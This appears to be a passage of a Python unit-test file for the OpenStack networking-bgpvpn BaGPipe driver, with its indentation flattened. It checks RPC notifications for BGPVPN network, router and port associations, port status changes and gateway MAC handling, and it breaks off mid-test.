# License for the specific language governing permissions and limitations
# under the License.
import copy
from unittest import mock
import webob.exc
from oslo_config import cfg
from neutron.api.rpc.handlers import resources_rpc
from neutron.db import agents_db
from neutron.db import db_base_plugin_v2
from neutron.debug import debug_agent
from neutron.plugins.ml2 import plugin as ml2_plugin
from neutron.plugins.ml2 import rpc as ml2_rpc
from neutron.tests.common import helpers
from neutron_lib.api.definitions import portbindings
from neutron_lib.callbacks import events
from neutron_lib import constants as const
from neutron_lib import context as n_context
from neutron_lib.plugins import directory
from networking_bgpvpn.neutron.services.service_drivers.bagpipe import bagpipe
from networking_bgpvpn.tests.unit.services import test_plugin
from networking_bagpipe.objects import bgpvpn as objs
def _expected_formatted_bgpvpn(id, net_id, rt=None, gateway_mac=None):
return {'id': id,
'network_id': net_id,
'l3vpn': {'import_rt': rt or mock.ANY,
'export_rt': rt or mock.ANY},
'gateway_mac': gateway_mac or mock.ANY}
class TestCorePluginWithAgents(db_base_plugin_v2.NeutronDbPluginV2,
agents_db.AgentDbMixin):
pass
class TestBagpipeCommon(test_plugin.BgpvpnTestCaseMixin):
def setUp(self, plugin=None,
driver=('networking_bgpvpn.neutron.services.service_drivers.'
'bagpipe.bagpipe.BaGPipeBGPVPNDriver')):
self.mocked_rpc = mock.patch(
'networking_bagpipe.agent.bgpvpn.rpc_client'
'.BGPVPNAgentNotifyApi').start().return_value
self.mock_attach_rpc = self.mocked_rpc.attach_port_on_bgpvpn
self.mock_detach_rpc = self.mocked_rpc.detach_port_from_bgpvpn
self.mock_update_rpc = self.mocked_rpc.update_bgpvpn
self.mock_delete_rpc = self.mocked_rpc.delete_bgpvpn
mock.patch(
'neutron_lib.rpc.get_client').start().return_value
if not plugin:
plugin = '%s.%s' % (__name__, TestCorePluginWithAgents.__name__)
super(TestBagpipeCommon, self).setUp(service_provider=driver,
core_plugin=plugin)
self.ctxt = n_context.Context('fake_user', self._tenant_id)
n_dict = {"name": "netfoo",
"tenant_id": self._tenant_id,
"admin_state_up": True,
"router:external": True,
"shared": True}
self.external_net = {'network':
self.plugin.create_network(self.ctxt,
{'network': n_dict})}
class AnyOfClass(object):
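    """Equality helper: compares equal to any instance of the wrapped class (useful in mock call assertions)."""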
def __init__(self, cls):
self._class = cls
def __eq__(self, other):
return isinstance(other, self._class)
def __repr__(self):
return "AnyOfClass<%s>" % self._class.__name__
class TestBagpipeOVOPushPullMixin(object):
# tests for OVO-based push notifications go here
@mock.patch.object(resources_rpc.ResourcesPushRpcApi, 'push')
def test_bgpvpn_update_name_only(self, mocked_push):
with self.bgpvpn() as bgpvpn:
self._update('bgpvpn/bgpvpns',
bgpvpn['bgpvpn']['id'],
{'bgpvpn': {'name': 'newname'}})
# check that no RPC push is done for BGPVPN objects
self.assertTrue(
mocked_push.call_count == 0 or
(not any([isinstance(ovo, objs.BGPVPNNetAssociation)
for ovo in mocked_push.mock_calls[0][1][1]]) and
not any([isinstance(ovo, objs.BGPVPNRouterAssociation)
for ovo in mocked_push.mock_calls[0][1][1]])
)
)
@mock.patch.object(resources_rpc.ResourcesPushRpcApi, 'push')
def test_bgpvpn_update_rts_no_assoc(self, mocked_push):
with self.bgpvpn() as bgpvpn:
self._update('bgpvpn/bgpvpns',
bgpvpn['bgpvpn']['id'],
{'bgpvpn': {'route_targets': ['64512:43']}})
# check that no RPC push is done for BGPVPN objects
self.assertTrue(
mocked_push.call_count == 0 or
(not any([isinstance(ovo, objs.BGPVPNNetAssociation)
for ovo in mocked_push.mock_calls[0][1][1]]) and
not any([isinstance(ovo, objs.BGPVPNRouterAssociation)
for ovo in mocked_push.mock_calls[0][1][1]])
)
)
@mock.patch.object(resources_rpc.ResourcesPushRpcApi, '_push')
def test_bgpvpn_update_delete_rts_with_assocs(self, mocked_push):
with self.bgpvpn(do_delete=False) as bgpvpn, \
self.network() as net, \
self.router(tenant_id=self._tenant_id) as router, \
self.assoc_net(bgpvpn['bgpvpn']['id'],
net['network']['id'],
do_disassociate=False), \
self.assoc_router(bgpvpn['bgpvpn']['id'],
router['router']['id'],
do_disassociate=False):
mocked_push.reset_mock()
self._update('bgpvpn/bgpvpns',
bgpvpn['bgpvpn']['id'],
{'bgpvpn': {'route_targets': ['64512:43']}})
mocked_push.assert_any_call(mock.ANY, 'BGPVPNNetAssociation',
mock.ANY, 'updated')
mocked_push.assert_any_call(mock.ANY, 'BGPVPNRouterAssociation',
mock.ANY, 'updated')
mocked_push.reset_mock()
# delete BGPVPN
self._delete('bgpvpn/bgpvpns',
bgpvpn['bgpvpn']['id'])
# after delete
mocked_push.assert_any_call(mock.ANY, 'BGPVPNNetAssociation',
mock.ANY, 'deleted')
mocked_push.assert_any_call(mock.ANY, 'BGPVPNRouterAssociation',
mock.ANY, 'deleted')
@mock.patch.object(resources_rpc.ResourcesPushRpcApi, 'push')
def test_net_assoc_create_delete(self, mocked_push):
with self.network() as net, \
self.bgpvpn() as bgpvpn:
mocked_push.reset_mock()
with self.assoc_net(bgpvpn['bgpvpn']['id'],
net['network']['id']):
mocked_push.assert_called_once_with(mock.ANY, mock.ANY,
'created')
ovos_in_call = mocked_push.mock_calls[0][1][1]
self.assertEqual(
[AnyOfClass(objs.BGPVPNNetAssociation)],
ovos_in_call
)
mocked_push.reset_mock()
# after net assoc delete
mocked_push.assert_called_once_with(mock.ANY, mock.ANY, 'deleted')
ovos_in_call = mocked_push.mock_calls[0][1][1]
self.assertEqual(
[AnyOfClass(objs.BGPVPNNetAssociation)],
ovos_in_call
)
@mock.patch.object(resources_rpc.ResourcesPushRpcApi, 'push')
def test_router_assoc_create_delete(self, mocked_push):
with self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn() as bgpvpn:
mocked_push.reset_mock()
with self.assoc_router(bgpvpn['bgpvpn']['id'],
router['router']['id']):
mocked_push.assert_called_once_with(mock.ANY, mock.ANY,
'created')
ovos_in_call = mocked_push.mock_calls[0][1][1]
self.assertEqual(
[AnyOfClass(objs.BGPVPNRouterAssociation)],
ovos_in_call
)
mocked_push.reset_mock()
# after router assoc delete
mocked_push.assert_called_once_with(mock.ANY, mock.ANY, 'deleted')
ovos_in_call = mocked_push.mock_calls[0][1][1]
self.assertEqual(
[AnyOfClass(objs.BGPVPNRouterAssociation)],
ovos_in_call
)
@mock.patch.object(resources_rpc.ResourcesPushRpcApi, 'push')
def test_port_assoc_crud(self, mocked_push):
with self.port() as port, \
self.bgpvpn() as bgpvpn:
mocked_push.reset_mock()
with self.assoc_port(bgpvpn['bgpvpn']['id'],
port['port']['id']) as port_assoc:
mocked_push.assert_called_once_with(mock.ANY, mock.ANY,
'created')
ovos_in_call = mocked_push.mock_calls[0][1][1]
self.assertEqual(
[AnyOfClass(objs.BGPVPNPortAssociation)],
ovos_in_call
)
mocked_push.reset_mock()
self._update(
('bgpvpn/bgpvpns/%s/port_associations' %
bgpvpn['bgpvpn']['id']),
port_assoc['port_association']['id'],
{'port_association': {'advertise_fixed_ips': False}})
mocked_push.assert_called_once_with(mock.ANY, mock.ANY,
'updated')
ovos_in_call = mocked_push.mock_calls[0][1][1]
self.assertEqual(
[AnyOfClass(objs.BGPVPNPortAssociation)],
ovos_in_call
)
mocked_push.reset_mock()
# after port assoc delete
mocked_push.assert_called_once_with(mock.ANY, mock.ANY, 'deleted')
ovos_in_call = mocked_push.mock_calls[0][1][1]
self.assertEqual(
[AnyOfClass(objs.BGPVPNPortAssociation)],
ovos_in_call
)
class TestBagpipeServiceDriver(TestBagpipeCommon):
def test_create_bgpvpn_l2_fails(self):
bgpvpn_data = copy.copy(self.bgpvpn_data['bgpvpn'])
bgpvpn_data.update({"type": "l2"})
# Assert that an error is returned to the client
bgpvpn_req = self.new_create_request(
'bgpvpn/bgpvpns', bgpvpn_data)
res = bgpvpn_req.get_response(self.ext_api)
self.assertEqual(webob.exc.HTTPBadRequest.code,
res.status_int)
def test_create_bgpvpn_rds_fails(self):
bgpvpn_data = copy.copy(self.bgpvpn_data)
bgpvpn_data['bgpvpn'].update({"route_distinguishers": ["4444:55"]})
# Assert that an error is returned to the client
bgpvpn_req = self.new_create_request(
'bgpvpn/bgpvpns', bgpvpn_data)
res = bgpvpn_req.get_response(self.ext_api)
self.assertEqual(webob.exc.HTTPBadRequest.code,
res.status_int)
def test_bagpipe_update_bgpvpn_rds_fails(self):
with self.bgpvpn() as bgpvpn:
update_data = {'bgpvpn': {"route_distinguishers": ["4444:55"]}}
self._update('bgpvpn/bgpvpns',
bgpvpn['bgpvpn']['id'],
update_data,
expected_code=webob.exc.HTTPBadRequest.code)
show_bgpvpn = self._show('bgpvpn/bgpvpns',
bgpvpn['bgpvpn']['id'])
self.assertEqual([],
show_bgpvpn['bgpvpn']['route_distinguishers'])
def test_bagpipe_associate_net(self):
with self.port() as port1:
net_id = port1['port']['network_id']
with self.bgpvpn() as bgpvpn:
id = bgpvpn['bgpvpn']['id']
rt = bgpvpn['bgpvpn']['route_targets']
self.mock_update_rpc.reset_mock()
with self.assoc_net(id, net_id):
self.mock_update_rpc.assert_called_once_with(
mock.ANY,
_expected_formatted_bgpvpn(id, net_id, rt))
def test_bagpipe_associate_external_net_failed(self):
net_id = self.external_net['network']['id']
with self.bgpvpn(tenant_id='another_tenant') as bgpvpn:
id = bgpvpn['bgpvpn']['id']
data = {'network_association': {'network_id': net_id,
'tenant_id': self._tenant_id}}
bgpvpn_net_req = self.new_create_request(
'bgpvpn/bgpvpns',
data=data,
fmt=self.fmt,
id=id,
subresource='network_associations')
res = bgpvpn_net_req.get_response(self.ext_api)
self.assertEqual(res.status_int, webob.exc.HTTPForbidden.code)
def test_bagpipe_associate_router(self):
with self.router(tenant_id=self._tenant_id) as router:
router_id = router['router']['id']
with self.subnet() as subnet:
with self.port(subnet=subnet) as port:
net_id = port['port']['network_id']
subnet_id = subnet['subnet']['id']
itf = self._router_interface_action('add', router_id,
subnet_id, None)
itf_port = self.plugin.get_port(self.ctxt, itf['port_id'])
with self.bgpvpn() as bgpvpn:
id = bgpvpn['bgpvpn']['id']
rt = bgpvpn['bgpvpn']['route_targets']
self.mock_update_rpc.reset_mock()
with self.assoc_router(id, router_id):
self.mock_update_rpc.assert_called_once_with(
mock.ANY,
_expected_formatted_bgpvpn(
id, net_id,
rt,
itf_port['mac_address']))
def test_bagpipe_disassociate_net(self):
mocked_delete = self.mocked_rpc.delete_bgpvpn
with self.port() as port1:
net_id = port1['port']['network_id']
with self.bgpvpn() as bgpvpn:
id = bgpvpn['bgpvpn']['id']
rt = bgpvpn['bgpvpn']['route_targets']
with self.assoc_net(id, net_id,
do_disassociate=False) as assoc:
mocked_delete.reset_mock()
del_req = self.new_delete_request(
'bgpvpn/bgpvpns',
id,
fmt=self.fmt,
subresource='network_associations',
sub_id=assoc['network_association']['id'])
res = del_req.get_response(self.ext_api)
if res.status_int >= 400:
raise webob.exc.HTTPClientError(code=res.status_int)
mocked_delete.assert_called_once_with(
mock.ANY,
_expected_formatted_bgpvpn(id, net_id, rt))
def test_bagpipe_update_bgpvpn_rt(self):
with self.port() as port1:
net_id = port1['port']['network_id']
with self.bgpvpn() as bgpvpn:
id = bgpvpn['bgpvpn']['id']
rt = ['6543:21']
with self.assoc_net(id, net_id):
update_data = {'bgpvpn': {'route_targets': ['6543:21']}}
self.mock_update_rpc.reset_mock()
self._update('bgpvpn/bgpvpns',
bgpvpn['bgpvpn']['id'],
update_data)
self.mock_update_rpc.assert_called_once_with(
mock.ANY,
_expected_formatted_bgpvpn(id, net_id, rt))
def test_bagpipe_update_bgpvpn_with_router_assoc(self):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn() as bgpvpn, \
self.assoc_router(bgpvpn['bgpvpn']['id'],
router['router']['id']), \
self.port(subnet=subnet):
self._router_interface_action('add',
router['router']['id'],
subnet['subnet']['id'],
None)
update_data = {'bgpvpn': {'route_targets': ['6543:21']}}
self.mock_update_rpc.reset_mock()
self._update('bgpvpn/bgpvpns', bgpvpn['bgpvpn']['id'], update_data)
self.mock_update_rpc.assert_called_once_with(
mock.ANY,
_expected_formatted_bgpvpn(bgpvpn['bgpvpn']['id'],
net['network']['id']))
def test_bagpipe_delete_bgpvpn(self):
mocked_delete = self.mocked_rpc.delete_bgpvpn
with self.port() as port1:
net_id = port1['port']['network_id']
with self.bgpvpn(do_delete=False) as bgpvpn:
id = bgpvpn['bgpvpn']['id']
rt = bgpvpn['bgpvpn']['route_targets']
mocked_delete.reset_mock()
with self.assoc_net(id, net_id, do_disassociate=False):
self._delete('bgpvpn/bgpvpns', id)
mocked_delete.assert_called_once_with(
mock.ANY,
_expected_formatted_bgpvpn(id, net_id, rt))
def test_bagpipe_delete_bgpvpn_with_router_assoc(self):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn(do_delete=False) as bgpvpn, \
self.assoc_router(bgpvpn['bgpvpn']['id'],
router['router']['id'],
do_disassociate=False), \
self.port(subnet=subnet):
self._router_interface_action('add',
router['router']['id'],
subnet['subnet']['id'],
None)
self.mock_delete_rpc.reset_mock()
self._delete('bgpvpn/bgpvpns', bgpvpn['bgpvpn']['id'])
self.mocked_rpc.delete_bgpvpn.assert_called_once_with(
mock.ANY,
_expected_formatted_bgpvpn(bgpvpn['bgpvpn']['id'],
net['network']['id']))
def test_bagpipe_callback_to_rpc_update_port_after_router_itf_added(self):
driver = self.bgpvpn_plugin.driver
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn() as bgpvpn:
itf = self._router_interface_action('add',
router['router']['id'],
subnet['subnet']['id'],
None)
with self.assoc_router(bgpvpn['bgpvpn']['id'],
router['router']['id']), \
self.port(subnet=subnet) as port:
mac_address = port['port']['mac_address']
formatted_ip = (port['port']['fixed_ips'][0]['ip_address'] +
'/' + subnet['subnet']['cidr'].split('/')[-1])
itf_port = self.plugin.get_port(self.ctxt, itf['port_id'])
expected = {
'gateway_ip': subnet['subnet']['gateway_ip'],
'mac_address': mac_address,
'ip_address': formatted_ip,
'gateway_mac': itf_port['mac_address']
}
expected.update(driver._format_bgpvpn_network_route_targets(
[bgpvpn['bgpvpn']]))
actual = driver._retrieve_bgpvpn_network_info_for_port(
self.ctxt, port['port'])
self.assertEqual(expected, actual)
def test_bagpipe_get_network_info_for_port(self):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.router(tenant_id=self._tenant_id) as router, \
self.port(subnet=subnet) as port:
itf = self._router_interface_action('add',
router['router']['id'],
subnet['subnet']['id'],
None)
itf_port = self.plugin.get_port(self.ctxt, itf['port_id'])
r = bagpipe.get_network_info_for_port(self.ctxt,
port['port']['id'],
net['network']['id'])
expected_ip = port['port']['fixed_ips'][0]['ip_address'] + "/24"
self.assertEqual({
'mac_address': port['port']['mac_address'],
'ip_address': expected_ip,
'gateway_ip': subnet['subnet']['gateway_ip'],
'gateway_mac': itf_port['mac_address']
}, r)
RT = '12345:1'
BGPVPN_INFO = {'mac_address': 'de:ad:00:00:be:ef',
'ip_address': '10.0.0.2',
'gateway_ip': '10.0.0.1',
'l3vpn': {'import_rt': [RT],
'export_rt': [RT]
},
'gateway_mac': None
}
class TestCorePluginML2WithAgents(ml2_plugin.Ml2Plugin,
agents_db.AgentDbMixin):
pass
class TestBagpipeServiceDriverCallbacks(TestBagpipeCommon,
TestBagpipeOVOPushPullMixin):
'''Check that receiving callbacks results in RPC calls to the agent'''
def setUp(self):
cfg.CONF.set_override('mechanism_drivers',
['logger', 'fake_agent'],
'ml2')
super(TestBagpipeServiceDriverCallbacks, self).setUp(
"%s.%s" % (__name__, TestCorePluginML2WithAgents.__name__))
self.port_create_status = 'DOWN'
self.plugin = directory.get_plugin()
self.plugin.start_rpc_listeners()
self.bagpipe_driver = self.bgpvpn_plugin.driver
self.patched_driver = mock.patch.object(
self.bgpvpn_plugin.driver,
'_retrieve_bgpvpn_network_info_for_port',
return_value=BGPVPN_INFO)
self.patched_driver.start()
# we choose an agent of type const.AGENT_TYPE_OFA
# because this is the type used by the fake_agent mech driver
helpers.register_ovs_agent(helpers.HOST, const.AGENT_TYPE_OFA)
helpers.register_l3_agent()
def _build_expected_return_active(self, port):
bgpvpn_info_port = BGPVPN_INFO.copy()
bgpvpn_info_port.update({'id': port['id'],
'network_id': port['network_id']})
return bgpvpn_info_port
def _build_expected_return_down(self, port):
return {'id': port['id'],
'network_id': port['network_id']}
def _update_port_status(self, port, status):
network_id = port['port']['network_id']
some_network = {'id': network_id}
self.plugin.get_network = mock.Mock(return_value=some_network)
self.plugin.update_port_status(self.ctxt, port['port']['id'],
status, helpers.HOST)
def test_bagpipe_callback_to_rpc_update_down2active(self):
with self.port(arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.mock_attach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_active(port['port']),
helpers.HOST)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_update_active2down(self):
with self.port(arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_detach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_down(port['port']),
helpers.HOST)
self.assertFalse(self.mock_attach_rpc.called)
def test_bagpipe_callback_to_rpc_update_active2active(self):
with self.port(arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_update_down2down(self):
with self.port(arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_deleted(self):
with self.port(arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self.plugin.delete_port(self.ctxt, port['port']['id'])
self.mock_detach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_down(port['port']),
helpers.HOST)
self.assertFalse(self.mock_attach_rpc.called)
def test_bagpipe_callback_to_rpc_update_active_ignore_net_ports(self):
with self.port(device_owner=const.DEVICE_OWNER_NETWORK_PREFIX,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_dont_ignore_probe_ports_compute(self):
with self.port(device_owner=debug_agent.DEVICE_OWNER_COMPUTE_PROBE,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.mock_attach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_active(port['port']),
helpers.HOST)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_dont_ignore_probe_ports_network(self):
with self.port(device_owner=debug_agent.DEVICE_OWNER_NETWORK_PROBE,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.mock_attach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_active(port['port']),
helpers.HOST)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_update_down_ignore_net_ports(self):
with self.port(device_owner=const.DEVICE_OWNER_NETWORK_PREFIX,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_deleted_ignore_net_ports(self):
with self.port(device_owner=const.DEVICE_OWNER_NETWORK_PREFIX,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self.bagpipe_driver.registry_port_deleted(
None, None, None,
context=self.ctxt,
port_id=port['port']['id']
)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_update_active_ignore_external_net(self):
with self.subnet(network=self.external_net) as subnet, \
self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_update_down_ignore_external_net(self):
with self.subnet(network=self.external_net) as subnet, \
self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_deleted_ignore_external_net(self):
with self.subnet(network=self.external_net) as subnet, \
self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self.bagpipe_driver.registry_port_deleted(
None, None, None,
context=self.ctxt,
port_id=port['port']['id']
)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
def test_delete_port_to_bgpvpn_rpc(self):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port, \
mock.patch.object(self.plugin, 'get_port',
return_value=port['port']), \
mock.patch.object(self.plugin, 'get_network',
return_value=net['network']):
self.plugin.delete_port(self.ctxt, port['port']['id'])
self.mock_detach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_down(port['port']),
helpers.HOST)
def test_bagpipe_callback_to_rpc_update_port_router_itf_added(self):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.port(subnet=subnet) as port, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn() as bgpvpn, \
mock.patch.object(self.bagpipe_driver, 'get_bgpvpn',
return_value=bgpvpn['bgpvpn']),\
mock.patch.object(bagpipe,
'get_router_bgpvpn_assocs',
return_value=[{
'bgpvpn_id': bgpvpn['bgpvpn']['id']
}]).start():
payload = events.DBEventPayload(
self.ctxt, resource_id=router['router']['id'],
metadata={'port': {'network_id': net['network']['id']}})
self.bagpipe_driver.registry_router_interface_created(
None, None, None, payload=payload
)
self.mock_update_rpc.assert_called_once_with(
mock.ANY,
self.bagpipe_driver._format_bgpvpn(self.ctxt,
bgpvpn['bgpvpn'],
port['port']['network_id']))
def test_bagpipe_callback_to_rpc_update_port_router_itf_removed(self):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.port(subnet=subnet) as port, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn() as bgpvpn, \
mock.patch.object(self.bagpipe_driver, 'get_bgpvpn',
return_value=bgpvpn['bgpvpn']),\
mock.patch.object(bagpipe,
'get_router_bgpvpn_assocs',
return_value=[{
'bgpvpn_id': bgpvpn['bgpvpn']['id']
}]).start():
payload = events.DBEventPayload(
self.ctxt, metadata={
'network_id': port['port']['network_id'],
'port': {
'device_id': router['router']['id'],
'network_id': net['network']['id']}
})
self.bagpipe_driver.registry_router_interface_deleted(
None, None, None,
payload=payload
)
self.mock_delete_rpc.assert_called_once_with(
mock.ANY,
self.bagpipe_driver._format_bgpvpn(self.ctxt,
bgpvpn['bgpvpn'],
port['port']['network_id']))
def test_l3agent_add_remove_router_interface_to_bgpvpn_rpc(self):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn() as bgpvpn, \
self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}), \
mock.patch.object(bagpipe,
'get_router_bgpvpn_assocs',
return_value=[{
'bgpvpn_id': bgpvpn['bgpvpn']['id']
}]).start():
self._router_interface_action('add',
router['router']['id'],
subnet['subnet']['id'],
None)
self.mock_update_rpc.assert_called_once_with(
mock.ANY,
self.bagpipe_driver._format_bgpvpn(self.ctxt,
bgpvpn['bgpvpn'],
net['network']['id']))
self._router_interface_action('remove',
router['router']['id'],
subnet['subnet']['id'],
None)
self.mock_delete_rpc.assert_called_once_with(
mock.ANY,
self.bagpipe_driver._format_bgpvpn(self.ctxt,
bgpvpn['bgpvpn'],
net['network']['id']))
def test_gateway_mac_info_rpc(self):
BGPVPN_INFO_GW_MAC = copy.copy(BGPVPN_INFO)
BGPVPN_INFO_GW_MAC.update(gateway_mac='aa:bb:cc:dd:ee:ff')
self.patched_driver.stop()
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn(route_targets=[RT]) as bgpvpn, \
self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port, \
self.assoc_net(bgpvpn['bgpvpn']['id'],
net['network']['id']), \
mock.patch.object(self.bgpvpn_plugin.driver,
'retrieve_bgpvpns_of_router_assocs'
'_by_network',
return_value=[{'type': 'l3',
'route_targets': [RT]}]
):
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
itf = self._router_interface_action('add',
router['router']['id'],
subnet['subnet']['id'],
None)
itf_port = self.plugin.get_port(self.ctxt, itf['port_id'])
self.mock_update_rpc.assert_called_with(
mock.ANY,
_expected_formatted_bgpvpn(bgpvpn['bgpvpn']['id'],
net['network']['id'],
[RT],
gateway_mac=itf_port['mac_address'])
)
self._router_interface_action('remove',
router['router']['id'],
subnet['subnet']['id'],
None)
self.mock_update_rpc.assert_called_with(
mock.ANY,
_expected_formatted_bgpvpn(bgpvpn['bgpvpn']['id'],
net['network']['id'],
[RT],
gateway_mac=None)
)
self.patched_driver.start()
def test_l2agent_rpc_to_bgpvpn_rpc(self):
#
        # Test that actually simulates the ML2 codepath that
        # generates the registry events.
ml2_rpc_callbacks = ml2_rpc.RpcCallbacks(mock.Mock(), mock.Mock())
n_dict = {"name": "netfoo",
"tenant_id": self._tenant_id,
"admin_state_up": True,
"shared": False}
net = self.plugin.create_network(self.ctxt, {'network': n_dict})
subnet_dict = {'name': 'test_subnet',
'tenant_id': self._tenant_id,
'ip_version': 4,
'cidr': '10.0.0.0/24',
'allocation_pools': [{'start': '10.0.0.2',
'end': '10.0.0.254'}],
'enable_dhcp': False,
'dns_nameservers': [],
'host_routes': [],
'network_id': net['id']}
self.plugin.create_subnet(self.ctxt, {'subnet': subnet_dict})
p_dict = {'network_id': net['id'],
'tenant_id': self._tenant_id,
'name': 'fooport',
"admin_state_up": True,
"device_id": "tapfoo",
"device_owner": "not_me",
"mac_address": "de:ad:00:00:be:ef",
"fixed_ips": [],
"binding:host_id": helpers.HOST,
}
port = self.plugin.create_port(self.ctxt, {'port': p_dict})
ml2_rpc_callbacks.update_device_up(self.ctxt,
host=helpers.HOST,
agent_id='fooagent',
device="de:ad:00:00:be:ef")
self.mock_attach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_active(port),
helpers.HOST)
ml2_rpc_callbacks.update_device_down(self.ctxt,
host=helpers.HOST,
agent_id='fooagent',
device="de:ad:00:00:be:ef")
self.mock_detach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_down(port),
helpers.HOST)
self.mock_detach_rpc.reset_mock()
self.plugin.delete_port(self.ctxt, port['id'])
self.mock_detach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_down(port),
helpers.HOST)
def test_exception_on_callback(self):
with mock.patch.object(bagpipe.LOG, 'exception') as log_exc:
self.bagpipe_driver.registry_port_updated(
